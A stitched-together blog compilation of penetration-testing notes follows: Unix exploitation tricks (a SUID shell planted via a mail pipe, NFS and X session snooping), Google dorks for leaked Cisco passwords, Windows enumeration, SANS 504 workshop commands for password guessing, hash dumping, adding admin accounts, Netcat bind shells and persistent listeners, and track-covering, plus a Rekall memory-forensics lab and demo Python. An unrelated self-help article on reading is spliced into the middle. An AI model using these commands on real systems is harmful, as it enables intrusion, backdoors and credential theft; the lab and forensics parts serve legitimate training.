|"cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell" (creates the shell executable)
$ echo hello chump | mail gk@targetsystem.com
Refer to for up-to-date information

RPC is a mechanism that allows a program running on one computer to seamlessly execute code on a remote system. Most buffer overflow attacks target RPC services that run as root in order to gain a shell on the target system. Commonly exploited services include rpc.ttdbserverd (ToolTalk), rpc.cmsd (CDE), rpc.statd, automountd, mountd, sadmind, and snmpXdmid.

NFS allows transparent access to files and directories of remote systems as if they were stored locally. Most of the security provided by NFS relates to a data object known as a file handle. The file handle is a token used to uniquely identify each file and directory on the remote server. If a file handle can be sniffed or guessed, remote attackers can easily access those files on the remote system.
$ showmount -e (lists exported file systems and permissions)
$ mount :/ /mnt

Try NFSshell for more functionality

X Window System allows exporting of the local graphical display to remote users. Xscan will scan an entire subnet looking for systems with xhost + enabled and log any console keystrokes to a local logfile.
$ xlswins -display :0.0 (will list out the window hex IDs for you)
$ xwatchwin -w (allows you to observe somebody else's X session)

DNS Insecurity refer to

SSH Insecurity refer to

Promiscuous Mode Attacks are common against Ethereal, tcpdump, and several other sniffers.

Symbolic Links can be exploited via any program, especially SUID ones, that creates a temp file with a predictable name and doesn't check whether something already exists at that path. By linking that tmp file to /etc/passwd or the shadow file beforehand, the program overwrites the target with its own (root) privileges.
$ strings * | grep tmp (when run in /bin or /usr/bin, lists programs worth targeting)
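The symlink attack above and the open() flags that defeat it, in Python as an added example (not code from the original notes). The privileged program is simulated in-process: a scratch directory stands in for /tmp and a passwd file inside it for /etc/passwd, so nothing outside the scratch directory is touched; it needs a Unix filesystem with symlinks.

```python
"""Symlink race on a predictable temp file, and the open() flags that stop it.

Added example, not code from the original page. The privileged program is
simulated in-process: a scratch directory stands in for /tmp and a
'passwd' file inside it for /etc/passwd, so nothing outside the scratch
directory is touched. Requires a filesystem with symlinks (Unix).
"""
import os
import tempfile

PASSWD_LINE = "root:x:0:0:root:/root:/bin/sh\n"          # constructed victim content
PAYLOAD = "root::0:0:root:/root:/bin/sh\n"               # root with empty password


def careless_write(path, data):
    """What a sloppy SUID program does: open(path, O_WRONLY|O_CREAT|O_TRUNC).
    That follows symlinks, so if 'path' is a link the link target is
    truncated and rewritten with the caller's privileges."""
    with open(path, "w") as fh:
        fh.write(data)


def careful_write(path, data):
    """O_EXCL makes open() fail if anything already exists at the path,
    a symlink included; O_NOFOLLOW adds a second line of defence where
    the platform has it; mode 0600 keeps others from reading the file."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)


def run_demo():
    """Returns (victim content after the careless write, whether the careful
    write was refused and left the victim alone, whether mkstemp avoided
    the guessable name)."""
    scratch = tempfile.mkdtemp()
    victim = os.path.join(scratch, "passwd")
    with open(victim, "w") as fh:
        fh.write(PASSWD_LINE)

    # The attacker has read `strings` output and knows the program will
    # write /tmp/prog.tmp, so the link is planted before the program runs.
    guessable = os.path.join(scratch, "prog.tmp")
    os.symlink(victim, guessable)

    careless_write(guessable, PAYLOAD)             # goes through the link
    with open(victim) as fh:
        after = fh.read()

    try:
        careful_write(guessable, PAYLOAD)
        refused = False
    except OSError:                                # EEXIST (or ELOOP with O_NOFOLLOW)
        refused = True
    with open(victim) as fh:
        unchanged_by_careful = fh.read() == after

    # The right primitive: random name, O_EXCL, mode 0600, all in one call.
    fd, safe_path = tempfile.mkstemp(prefix="prog.", dir=scratch)
    os.close(fd)
    return after, refused and unchanged_by_careful, os.path.basename(safe_path) != "prog.tmp"


if __name__ == "__main__":
    content, refused, random_name = run_demo()
    print("victim now contains:", content.strip())
    print("careful open refused the symlink:", refused)
    print("mkstemp used an unguessable name:", random_name)
```

Checking for existence first and then opening does not close the hole, since the link can be planted between the two calls; only an atomic create (O_CREAT|O_EXCL, or mkstemp which wraps it) does.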

File Descriptors are nonnegative integers that the system uses to keep track of open files rather than file names (0, 1, 2 = stdin, stdout, stderr). If a privileged process leaves a file descriptor open read/write, it may be possible for an attacker to write to the file while it is being modified. To shell out of vi, execute :!sh and then modify the tmp file or run exploit code.


Pen Testing Notes

Cisco Hacking Exposed

!Host=*.* intext:enc_UserPassword=* ext:pcf
enable password | secret “current configuration” -intext:the
“intitle:Cisco Systems, Inc. VPN 3000 Concentrator”
intitle:Cisco “You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator”
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password"
inurl:webvpn.html “login” “Please enter your”
"ip host tftp"
intext:"Written by enable_15"

Windows Command Line Kung Fu
Enumerate the network
C:\>set (use SET to get domain information and username)
C:\>net view (use NET VIEW to get computers in the user's domain and other domains)
C:\>net view /domain (use NET VIEW to get computers in other domains)
C:\>net user (use NET USER to get local users on the computer you are on)
C:\>net user /domain (all users in the current user's domain)
C:\>net localgroup (use NET LOCALGROUP to get the local groups on the computer)
C:\>net localgroup /domain (use NET LOCALGROUP to get the domain groups)
C:\>net localgroup administrators (all users in the local Administrators group)
C:\>net localgroup administrators /domain (all users in the domain Administrators group)
C:\>net group "Company Admins" /domain (all users in the "Company Admins" group)
C:\>net user "wesley.pipes" /domain (all info about this user)
C:\>nltest /dclist: (list domain controllers)

Find a user
NBTSTAT -a remotecomputer | FIND "<03>" | FIND /I /V "remotecomputer"
WMIC /Node:remotecomputer ComputerSystem Get UserName
PSLOGGEDON -L \\remotecomputer
PSEXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name "
PSEXEC \\remotecomputer NET NAME
PSEXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username"

Kill McAfee
Get SYSTEM level cmd prompt

Wednesday, July 17, 2019

How to Retain More From the Books You Read in 5 Simple Steps


When I grew up, it wasn’t cool to read. These days, every coffee shop is packed with folks that are reading a book while sipping on a latte.
That’s a great shift. I’m also reading more books than ever. But here’s the thing: It’s not about how many books you read, it’s about how much you retain from what you read.
Most people I talk to don’t have a reading strategy. They just pick up something and start reading. I used to be like that. But now, that’s unthinkable to me. Sure, you might read a novel for entertainment.
But think about it; why do you even read a non-fiction book in the first place? Exactly, you want to get something out of it. You want to learn things that you can apply in your life to grow. That’s the whole point.
I’m often asked: “How do you remember information you read in books?” In this post, I’ll explain my system.

1. Have A Purpose

Before I even think about which books I’m going to read, I think about what I’m trying to achieve. I strongly believe that the content of books should align with what’s going on in your life. I’ll give you an example.
When I met one of my mentors in 2011, he recommended me to read Flow by Mihaly Csikszentmihalyi. I listened to his advice and bought the book. I also started reading it. But I didn’t connect with the content at the time. Does that mean Flow is a bad book? No. In fact, I read it a while back and really loved it. It’s the best book on working habits that I’ve read.
But back in 2011, that kind of stuff wasn’t on my mind. I had just finished my degree and started a business. I was hustling like a moron and only thinking about growing our business. That’s why you need a purpose to read.
What’s going on in your life? Are you building a business? Going through a divorce? Looking for a job? Trying to take the next step in your career? Do you want to get more things done?
Only read books that teach you how to overcome your current challenges.

2. See Yourself As A Teacher

Knowledge is only good if you apply it, right? But here’s one thing a lot of people don’t consider: Sharing knowledge is a great application. You might not be a teacher, but if you act like one, you’re already applying knowledge. All it takes is a mindset shift.
Don’t just ‘read’ a book. No, devour a book and talk about it with others.
Say to yourself: “I must focus on the book at hand because I’m going to share everything I learned with others. I better know my shit.”

3. Highlight & Make Mental Connections

The more connections you make between pieces of information in your brain, the better you remember it. I do that by making a lot of notes.
If you think books are sacred and shouldn’t be highlighted and written on, you will never retain a lot from books. Making notes, folding pages, and highlighting text is simple and practical.
That’s why I always keep a highlighter and pen with me. If you read digitally, you only need your finger—just don’t forget to highlight interesting passages.
Here are some other tips that help me to make better connections between information:
  • I have a separate “Book Notes” folder in my note-taking app.
  • When I highlight something very important, I take a picture of that page and upload it to my Book Notes.
  • Then, I immediately write WHY it’s important and how I can use it.
I use this process because I often highlight things, and when I look back, I think: “Why did I highlight this?”
So always write down why you highlighted something. You don’t have to do it for every highlight. Just do it for sections that you immediately have an application for. I often write down how I can use a piece of advice in my business. And when I get an idea for an article, I think of a title and attach a picture of the text that I highlighted.

4. Visualize & Imagine

Another great way to make connections in your mind is by visualizing what you’re learning. We’re visual learners, and our memories are also visual.
What I like to do when I read is to have imaginary conversations about the stuff that I’m reading. I imagine myself sitting together with a friend and talking about the subject. Or, when I read a piece of useful advice, I visualize myself actually doing that thing.
I remember vividly when I read How To Win Friends And Influence People by Dale Carnegie for the first time. One of the pieces of advice Carnegie gives is to become genuinely interested in people.
So I visualized myself having a conversation with a stranger and being genuinely interested in what that person had to say. When you visualize something, it’s almost like the real thing.
Visualization is also a common self-improvement tool that’s been used by many top performers. Recently retired NBA player Paul Pierce once explained how he uses it before a game:
“I probably visualize myself, the shots I’m going to get in the game, how I’m going to play defense, what we have to do to stop the other team’s best player, what it’s going to take out of me, the whole aspect of the game.”

5. Immediately Apply One Piece Of New Knowledge

Look at your life. Ask yourself: How can I grow? That can be personally, financially or spiritually.
Understand that growth doesn’t happen by itself. Learning new skills, earning more money, having a great relationship — it all takes hard work.
But you can make that growth a lot easier if you apply the things you learn in books.
Remember: Knowledge alone is completely useless.
There’s nothing sadder than a well-read person who holds himself captive by the four walls of his room. You must go out there and apply things you learn.
Once you do that, you will grow. No doubt about it. So always ask yourself this after you finish a book:
“What’s the one thing I’m going to apply after reading this book?”
You see, it’s about what you do with your knowledge, not about how much you have. Don’t read more. Read smarter.
Also, apply this strategy to everything you read. Even something little like this article. So let’s do a little exercise to close this off:
What’s the one thing you’re going to apply after reading this article?
Answer (and visualize) that, and I’ll bet you’ll retain more from this article than any other thing you’ve read today.

Say to yourself: “I must focus on the book at hand because I’m going to share everything I learned with others. I better know my shit.”

So always write down why you highlighted something.

It’s not about how many books you read, it’s about how much you retain from what you read.


Thursday, May 2, 2019

5) 504.6 - Computer & Network Hacker Exploits, WORKSHOP

504.6 - Hacker Tools Workshop\6.1 Hacker Exploits Hands-On:

Most Important Tools to Use Today
• Very Important:
— Nmap: Port scanning and OS fingerprinting (Linux)
— Nessus: Vulnerability scanning (Linux)
— Netcat: Backdoors and file transfer (Windows and Linux)
— Enum: Determining users and groups, and password guessing (Windows)
— Metasploit: Exploiting vulnerable targets (Linux and Windows)
— John the Ripper: Password cracking (Linux and Windows)
— Fgdump: Remote SAM password hash dumper (Windows)
• Everything you need to win the game is included in this environment

Step I: Overview of Reconnaissance:
• Acquire Domain Name
• Open Source
• Whois lookup
• ARIN lookup
• DNS Interrogation

Acquire Domain Name
• No connection to the Internet (we want to control the environment), so we will simulate the next steps
Let’s pick a target organization
• How about an organization named “SANS 504 Target Company” with domain name “target.tgt”?
• They are the owner of Target Widgets, producer of the finest Widgets in the world
• Analyze their websites and think about the business service that each offers

Do a Whois search for target.tgt!

You will notice:

DNS Interrogation - Zone Transfer:
• To perform a zone transfer, we can use nslookup in Windows or dig in Linux
• Windows:
C:\> nslookup
> server [DNS server IP]
> ls -d target.tgt

• Linux:
# dig @[DNS server IP] target.tgt -t AXFR
• A transfer only succeeds if that server is authoritative for the zone and allows AXFR from your address; a well-run server refuses it. The ls subcommand exists in the Windows nslookup but not in the BIND nslookup shipped on most Linux distros, so use dig there.

• Goal is to harvest target IP addresses

Step 2: Overview of Scanning
• Ping Sweeping (Nmap)
• Port: Scanning (Nmap)
• OS Fingerprinting (Nmap)
• Vulnerability Scanning (Nessus)
• Null Sessions (Windows)

Server Discovery — Exercise
• Using Nmap, try to fill out information about the target servers
• Use the templates earlier in this book
• Draw a diagram of the network, based on the discovery phase (the diagram will be simple!)
• Include the following:
— Topology layout
— IP addresses
— Open ports, with services and versions if possible
— Operating system type

Enum Against Windows:
• Don’t forget to run Enum against all discovered Windows machines
- Enum with various flags will be useful:
C:\> enum -U [target IPaddr]
C:\> enum -G [target IPaddr]
C:\> enum -D -u [user] -f [password.lst] [target IPaddr]
- For enum -D, please make sure your system can speak NTLMv1
Run secpol.msc
Go to Local Policies --> Security Options --> Network Security: LAN Manager Authentication Level
• Make sure it is set to "Send LM & NTLM responses"
• That setting makes your own machine send LM/NTLMv1 responses to anything that asks for them; set it back to the default once the exercise is over

Step 3: Gaining Access:
• Run exploits
• Depends on what was discovered during Phase 2
• Automated password guessing?
• Common Windows attacks?
• Metasploit exploitation
• Easily cracked passwords?
• Buffer overflow vulnerabilities?
• Others?

Compromising Additional Machines
• Once one machine is compromised, attackers can use it as a jumping off point for other attacks
- Exploit Windows SMB sessions between target machines
• Net use, at, etc.
— Crack passwords, and look for systems where users have set up identical passwords on multiple machines.

Step 4: Keeping Access
• Planting Netcat backdoor
• Use Metasploit shell or Meterpreter payloads
• Deploying VNC
• Others?
• DO NOT put Rootkits on the target machines; too risky.

Step 5: Covering the Tracks
• Creating hidden files on Linux
— Directories named
• Creating hidden files on Windows
— Alternate data streams
• Don’t forget about shell history files!
— Could be useful for you to see what others are attempting
— You might want to cover your tracks by deleting your own shell histories on my machines.

Building a Lab at Home:
• Windows 2012 Server, IIS
• Linux, FTP Apache
• Windows 8, File Sharing
• openBSD, NFS, OpenSSH.

Capture the Flag Contest
• We’ll play a game of capture the flag
• There are four regular flags and one bonus flag
— flag1.txt, flag2.txt, flag3.txt, and flag4.txt
— and bonusflag.txt
- All flags are located at the top of the directory structure (inside C:\ on Windows and / on Linux)
• Each flag provides you information about a “Phrase that pays"
• Break in to my machines, look at the flags, and determine the phrase that pays.

Are you READY?
Remember the attack process:
1. Reconnaissance
2. Scanning
3. Exploiting Systems
4. Keeping Access — Backdoors and Trojans
5. Covering the Tracks
• Are there any questions on the ground rules or the Capture the Flag game?

DNS Interrogation:
• To attempt a zone transfer from a Windows system
- C:\> nslookup
-> server 10.10.10.45
-> ls -d target.tgt
• To attempt a zone transfer from a Unix system
- # dig @10.10.10.45 target.tgt -t AXFR

• Run an "aggressive" Nmap scan (-A turns on OS fingerprinting, version scanning, NSE scripts and traceroute) and save the output to a file for future reference
- # nmap -A <target> --reason -oA <file>
- -oA writes normal, grepable and XML output using <file> as the basename; -oN <file> keeps only the normal format

• Scan specific port(s) on target
- # nmap -p <port(s)> <target> --reason

• Perform a version scan on specific port(s)
# nmap -sV -p <port(s)> <target> --reason

• Additional options you might find helpful
- --reason         (shows why Nmap classed each port as open, closed or filtered, e.g. syn-ack or reset)
- --packet-trace   (shows every packet sent and received)
- --traceroute     (shows the path to each host, useful for the network diagram)

Enum (to enumerate users, groups and password policy, and to guess passwords):
• To use Enum to enumerate information about a Windows target
• Enumerate User Accounts
C:\> enum -U [target]
• Enumerate Password Policy Information
- C:\> enum -P [target]
• Enumerate Groups
C:\> enum -G [target]
• You can combine the options
- C:\> enum -UGP [target]
• Run a dictionary attack against a target (check the lockout threshold reported by enum -P first, or you will lock the account)
- C:\> enum -D -u [user] -f [wordfile] [target]

Appendix: Helpful commands - Pwdump:
• To dump the password hashes from a remote machine that you have an admin-level user ID and password for
- C:\> pwdump3 [target] [outfile] [user]

• Then enter the password for the user ID you used.

- steps to setup an exploit/payload combo
- we will use psexec once we know the username and password.

John The Ripper
• Linux: To unshadow a passwd file
- # unshadow /etc/passwd /etc/shadow > /tmp/combined
• Linux: To crack an un-shadowed password file
- # john /tmp/combined
• Windows: To crack a file with Windows hashes
- C:\> john <hash file>
• john.pot holds the hashes John has already cracked, and John silently skips any hash that is already in it; delete john.pot if you want to crack the same file again from scratch. (An interrupted run is resumed with john --restore, which reads the separate john.rec session file.)

Windows Net Commands:
• To create an Administrator-level account
- C:\> net user [user] [password] /add
- C:\> net localgroup administrators [user] /add

• To delete a user account that you've created
- C:\> net user [user] /delete
• Map a drive letter to the remote target's C$ share (requires Administrator-level credentials on the target)
- C:\> net use * \\[target]\C$ [password] /u:[target]\[user]
• To delete all of your net use sessions (careful)
C:\> net use * /d /y

Remote Access
• VNC
- $ vncviewer <TargetIP>
• SSH
- $ ssh User@<TargetIP>
• Telnet
- $ telnet <TargetIP>

• To create a Netcat listener (example)
# nc -lnvp 7777
• To connect to a port (example)
# nc -nv <TargetIP> 7777
• To shovel a shell (Linux example; strictly this is a bind shell: the listener hands /bin/sh to whoever connects)
- # nc -lnvp 7777 -e /bin/sh
• To shovel a shell (Windows example)
# nc -lnvp 7777 -e cmd.exe
• To shovel the contents of a file to whoever connects
- # nc -lnvp 7777 < file.txt
• To set up a persistent Linux listener (the loop restarts the listener each time a client disconnects)
- # while [ 1 ]; do echo "Started"; nc -lnp [port] -e /bin/sh; done
• -e only exists in Netcat builds compiled with it (the "traditional" nc, or Ncat's --exec); OpenBSD nc lacks it, so there you need another way to wire a shell to the socket (a named pipe, for instance) or one of the Metasploit payloads above

• To compile and run exploit code
- $ gcc <exploit source> -o <outfile>
- $ ./<outfile>
• What user am I in Linux?
$ whoami
$ id
• Become root if you have the password
$ su -

Vi Editor:
• To open or create a new file
# vim <file>
• Once in a file, to enable editing
- Press 'a' (append after the cursor; 'i' inserts before it)
• When done editing
- Press 'Esc', then ':', then 'wq!'

• To hide data
# echo “Hello there.” > hideme.txt
- # ./hydan ./ls hideme.txt > <outfile>

• To retrieve data
- # ./hydan-decode <stegofile>
• Enter password when prompted

Hydan is in:

Cross-Site Scripting Example:
• To display an alert (example)
- http://<SCRIPT LANGUAGE=Javascript>alert("You are vulnerable to cross-site scripting!");</SCRIPT>
• Script to steal cookies from a victim (example)



5) 504.5 - Computer & Network Hacker Exploits, Part 4 quick notes

504.5 - Computer & Network Hacker Exploits, Part 4

1. App-Level Trojan Horse backdoor Suites
- allow for the complete control of a victim system remotely across the network.
- client-server architecture.
- very popular and many examples:
Poison Ivy, VNC, Dameware (commercial), Sub7, and lots of others such as BlackShades and GhostRAT.

- attackers can trick victim into running tool.
- or attackers can install it themselves.
- payload option in Metasploit.

Don't fall for Scareware that your system is compromised!

wrappers and Packers:
- wrap a backdoor tool around some other application.
- create a Trojan Horse executable.
• Also known as “Binders”
• Example: Wrap nc.exe into an interactive birthday card
• Built into many backdoors (i.e., Poison Ivy)
• Metasploit msfvenom
• Can wrap into .VBS or VBA for macros in Word and Excel with exe2vba.rb and exe2vbs.rb
- The Veil toolkit uses some of these techniques to bypass AV!!!!
- SET’s default payload generation also does this

Windows anti-reverse engineering for Executables:
- For thwarting Windows reverse engineering of malicious code, attackers frequently use packers.
- Originally focused merely on compression of executables
• But, limits string searches and direct disassembly
— Gives attacker more obscurity

Dozens of different packing algorithms and tools
UPX is the most popular, available at
Many more listed at
Commercial ones as well (Thinstall, PECompact, PEBundle, etc.)

Defense: Unpacking Windows Executables
• To thwart these, researchers use unpackers
— Or, use a plug-in for a debugger
• Ollydbg — Very popular free Windows debugger
• Dozens of unpacking scripts run as plug-ins for Ollydbg at:
- That whole site contains amazingly helpful stuff for reverse engineering malware!
• If a custom packing/obscuring algorithm is used, the researcher might need to create a custom unpacker using code from the malware specimen under analysis; this could take a lot of time.

- Immunity Debugger - very popular free Windows debugger.
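The packer discussion above is easier to act on with a concrete first triage step. The following Python is an added example, not code from the course or from UPX, Ollydbg or Immunity: it scores a byte blob by Shannon entropy, looks for the UPX0/UPX1 section names and the UPX! tag that UPX leaves in a packed file, and counts the printable strings that packing suppresses. Both input blobs are constructed in the script to stand in for an unpacked and a packed executable; the 7.0 bits/byte threshold is an assumption to tune against your own corpus, and no PE section table is parsed (a real check would read it too).

```python
"""Added example (not from the course or any packer/unpacker it names):
cheap packed-executable triage on a byte blob."""
import hashlib
import math
import re


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


# Section names UPX creates and the tag it writes into the packed file
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def packer_markers(data: bytes) -> list:
    return [m.decode() for m in UPX_MARKERS if m in data]


def printable_strings(data: bytes, min_len: int = 5) -> list:
    """What the strings tool would report: runs of printable ASCII of min_len or more."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


ENTROPY_THRESHOLD = 7.0  # assumption: compressed or encrypted code usually sits above ~7 bits/byte


def looks_packed(data: bytes) -> bool:
    return shannon_entropy(data) >= ENTROPY_THRESHOLD or bool(packer_markers(data))


def triage(data: bytes) -> dict:
    return {"entropy": round(shannon_entropy(data), 2),
            "markers": packer_markers(data),
            "strings": len(printable_strings(data)),
            "packed": looks_packed(data)}


# Constructed stand-in for an unpacked binary: header text, imports and messages repeat
UNPACKED = (b"MZ\x90\x00This program cannot be run in DOS mode.\r\n"
            b"GetProcAddress\x00LoadLibraryA\x00kernel32.dll\x00" + bytes(8)) * 20

# Constructed stand-in for a packed binary: a deterministic pseudo-random body
# (SHA-256 chained over a counter, so the script runs offline) behind UPX section names
_body = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))
PACKED = b"UPX0" + bytes(4) + b"UPX1" + bytes(4) + _body

if __name__ == "__main__":
    for label, blob in (("unpacked", UNPACKED), ("packed", PACKED)):
        print(label, triage(blob))
```

The two signals fail in opposite directions: a custom packer drops the UPX names but cannot avoid high entropy, while a large embedded resource (an image, a compressed archive) raises entropy without any packing, so treat the score as a reason to open the file in a debugger, not as a verdict.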

5.3 Memory Analysis:

Investigators can use several tools to analyze memory dumps from Windows machines to determine attackers' actions, such as executing malicious application-level Trojan Horse backdoors.
• First, you'll need a memory dump
- Can be generated using a variety of utilities, including Mandiant's Memoryze (MemoryDD.bat), HBGary's fastdump, Matthieu Suiche's win32dd, winpmem, and ManTech's mdd

• Volatile Systems’ Volatility framework
- Free, open source, very feature rich and useful
— A modular tool written in Python

Google’s Rekall
— Free
- We focus on Rekall for analysis


• Some important Rekall modules include:
- imageinfo: Shows the date and time the memory dump was captured
- pstree: Shows the full process tree for a memory image
- pslist: Lists running processes (PID, name, and parent PID)
- dlllist: Lists the DLLs loaded by a process, as well as the command-line invocation of a process
- netstat: Lists open sockets and connections (PID, port, protocol, state, and when each was opened)
- filescan: Finds file objects in the dump (the files that were open at capture time)
- pedump: Dumps the code of a running process into an executable file
- modules: Lists loaded kernel modules from the dump, including drivers and SYS files

• Numerous other modules are included with Rekall, and more are available as separate downloads; most of them are listed at the URL on the slide

Start Rekall from its virtualenv on the course image and open the memory image:

sec504@slingshot:~$ source /home/tools/rekall/bin/activate

$ rekal -f /home/tools/504_memory_ex/memimage.dd

Rekall: Viewing Network Connections:
• Using Rekall's "netstat" module, we can display a list of active network connections at the time the memory dump was acquired:
[1] memimage.dd hh:mm:ss> netstat
• Output is similar to the following command on a live Windows machine:
C:\> netstat -nao | find "ESTABLISHED"

Viewing Processes:
• Rekall's "pslist" module displays a list of running processes at the time the image was acquired
[1] memimage.dd hh:mm:ss> pslist

• Output is similar to the following command on a live Windows machine:
C:\> wmic process get name, parentprocessid, processid

Rekall: DLLs and Command Line
Use Rekall's "dlllist" module to display a list of DLLs loaded by a process, as well as the command-line invocation of a running process:
[1] memimage.dd hh:mm:ss> dlllist pid=[pid_num]

Output is similar to the following commands on a live Windows machine:
C:\> tasklist /m /fi "pid eq [pid]"
C:\> wmic process where processid=[pid] get commandline

Example of a command line recovered this way from the lab image (a Netcat instance started with -e c:\ncrelay.bat):
c:\nc.exe -n 6000 -e c:\ncrelay.bat

For the list of DLLs loaded by every running process, we can use the following:
C:\> tasklist /m
For the list of DLLs loaded by a specific process, we can execute the following:
C:\> tasklist /m /fi “pid eq [pid]”

Lab: Windows Attack:

Using Rekall to analyze the image in /home/tools/504_memory_ex/memimage.dd, determine what the attacker was doing on the compromised system by answering the following questions:
1. Which processes are communicating with other machines on the network?
2. Which processes did the attacker likely run?
3. Is the attacker using the machine to pivot, and if so, how, and to which other systems is he/she pivoting?
4. Which suspicious process seems to be the root of all other suspicious activity on the compromised system?
5. Which builtin windows commands would you use if you were doing the same analysis on a live Windows system instead of a memory dump file?

Hint: First, populate this Connection Table - Lab: Windows Attack
As a hint, you might find it useful to start by populating the Connection Table provided in the slide. When this table is filled, you will have answered Question 1 and made significant progress on Question 2.
PID     PPID     Name         Remote IP         Remote Port

(for the table above)
- use Rekall's 'netstat' module.
- or in Windows (find is case-sensitive, and netstat prints the state in upper case):
c:\>netstat -nao | find "ESTABLISHED"

- get the parent process ID from Rekall's 'pslist' module (the PPID column)
or Windows:
c:\>wmic process get name, parentprocessid, processid

Another Hint: Then Populate this process table
PID     PPID         Name                 Command-Line Invocation

Start by copying over the information for processes you have on the Connection Table, and then use Rekall to analyze processes and fill in the blanks, especially the PPID and Command-Line Invocation fields.
You should also look for other, related processes the attacker might have invoked.
Pay special attention to process relationships indicated by the Parent Process ID (PPID).

Identify Processes by Connection (I):

- Determine which processes are communicating on the network using the Rekall "netstat" module
- Use the Rekall "pslist" module to cross-reference the PIDs associated with established network connections with the list of running processes, to determine the name of each process associated with each connection.
- Also record the Parent PID of each process, because you'll need it soon (PPID is the fourth column of Rekall's pslist output)

Also run the below in Windows:
C:\> wmic process get name ,parentprocessid,processid

Determine Command-Line Invocations:

• Next, we have to dive deeper and determine each process's command-line invocation using Rekall's "dlllist" module, paying particular attention to the Netcat instances
• For each process in our table, run:
[1] memimage.dd hh:mm:ss> dlllist pid=[pid_num]

>dlllist pid=1744

For Question 5, the rough equivalent of this command on a live Windows machine is:
C:\> wmic process where processid=[pid] get commandline
C:\> tasklist /m /fi “pid eq [pid]”

On a live Windows machine, the commands you’d use to pull this same kind of information are:
C:\> wmic process where processid=1896 get name, parentprocessid,processid

Or, if you want to more closely mimic the Rekall command used with Linux grep, you could run:
C:\> wmic process get name,parentprocessid,processid | find “2124”

And, to get the command-line invocation information, you could run:
C:\> wmic process where processid=2124 get commandline

Command line recovered for that PID (a cmd.exe instance), a ping sweep of 192.168.49.1-255, which is how the attacker is locating further targets to pivot to (Question 3):
cmd.exe /c for /L %i in (1,1,255) do @ping -n 1 192.168.49.%i

(1,1,255) means start with 1, step 1, up to 255.

Process Map (reconstructed from the sketch in the notes; each entry is a child of the one above it):
2516 explorer.exe
  +-- 3600 hot_pics.exe
       +-- 1744 nc.exe
       +-- 408 nc.exe
       |    +-- 2132 cmd.exe
       +-- 1428 metsvc.exe   (the sketch also links it to 496 services.exe)
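To make the table-filling procedure concrete, the following Python is an added example, not code from the course materials or the Rekall project. It rebuilds the Connection Table and Process Table from pslist- and netstat-style records, lists everything spawned under a given process, picks out pivot targets and sweep commands, and finds the root of the suspicious activity by walking PPIDs upward. The records are constructed to mirror the process map above: the PIDs, the nc.exe and cmd.exe command lines, the socket details and metsvc.exe's listener on 31337 are assumptions, and the tuple layout is a simplification rather than Rekall's output format.

```python
"""Added example (not from the course or the Rekall project): rebuild the lab's
Connection Table and Process Table and walk parent PIDs to answer Questions 1-4.
All records are constructed to mirror the process map in the notes."""
import re
from collections import defaultdict

# (pid, ppid, name, command line) -- constructed; command lines are assumptions
PROCESSES = [
    (4,    0,    "System",       ""),
    (496,  4,    "services.exe", r"C:\Windows\system32\services.exe"),
    (2516, 1000, "explorer.exe", r"C:\Windows\explorer.exe"),
    (3600, 2516, "hot_pics.exe", r"C:\Users\bob\Downloads\hot_pics.exe"),
    (1744, 3600, "nc.exe",       r"c:\nc.exe -l -p 6000 -e c:\ncrelay.bat"),
    (408,  3600, "nc.exe",       r"c:\nc.exe 10.10.10.18 443 -e cmd.exe"),
    (2132, 408,  "cmd.exe",      r"cmd.exe /c for /L %i in (1,1,255) do @ping -n 1 192.168.49.%i"),
    (1428, 496,  "metsvc.exe",   r"C:\Windows\system32\metsvc.exe"),  # installed as a service
]

# (pid, local, remote, state) -- constructed netstat-style records
CONNECTIONS = [
    (408,  "192.168.49.12:1051", "10.10.10.18:443",  "ESTABLISHED"),
    (1744, "0.0.0.0:6000",       "",                 "LISTENING"),
    (1428, "0.0.0.0:31337",      "",                 "LISTENING"),
    (2132, "192.168.49.12:1099", "192.168.49.7:445", "ESTABLISHED"),
]

SWEEP = re.compile(r"for /L .*\bping\b", re.IGNORECASE)


def connection_table(processes, connections):
    """Question 1: join each socket to its process name and PPID by PID."""
    by_pid = {p[0]: p for p in processes}
    rows = []
    for pid, local, remote, state in connections:
        _, ppid, name, _ = by_pid.get(pid, (pid, None, "<not in pslist>", ""))
        rows.append({"pid": pid, "ppid": ppid, "name": name,
                     "local": local, "remote": remote, "state": state})
    return rows


def children(processes):
    kids = defaultdict(list)
    for pid, ppid, _, _ in processes:
        kids[ppid].append(pid)
    return kids


def descendants(processes, root):
    """Question 2: everything spawned directly or indirectly under root."""
    kids, found, stack = children(processes), [], [root]
    while stack:
        for child in kids[stack.pop()]:
            found.append(child)
            stack.append(child)
    return sorted(found)


def pivot_targets(connections, suspicious):
    """Question 3: remote peers of suspicious processes (ESTABLISHED only)."""
    return {remote.rsplit(":", 1)[0] for pid, _, remote, state in connections
            if pid in suspicious and state == "ESTABLISHED"}


def sweep_commands(processes):
    """Question 3: command lines that walk a range of addresses."""
    return [pid for pid, _, _, cmd in processes if SWEEP.search(cmd)]


def suspicious_roots(processes, suspicious):
    """Question 4: a suspicious process whose parent is not suspicious is an
    entry point.  More than one root means the PPID chain is broken somewhere."""
    parent = {pid: ppid for pid, ppid, _, _ in processes}
    return sorted(pid for pid in suspicious if parent.get(pid) not in suspicious)


def print_tree(processes, root=2516, depth=0):
    """Indented parent/child view, like Rekall's pstree."""
    by_pid = {p[0]: p for p in processes}
    print("  " * depth + f"{root} {by_pid[root][2]}")
    for child in children(processes)[root]:
        print_tree(processes, child, depth + 1)


if __name__ == "__main__":
    for row in connection_table(PROCESSES, CONNECTIONS):
        print(row)
    print_tree(PROCESSES)
    bad = {3600, 1744, 408, 2132, 1428}
    print("spawned under hot_pics.exe:", descendants(PROCESSES, 3600))
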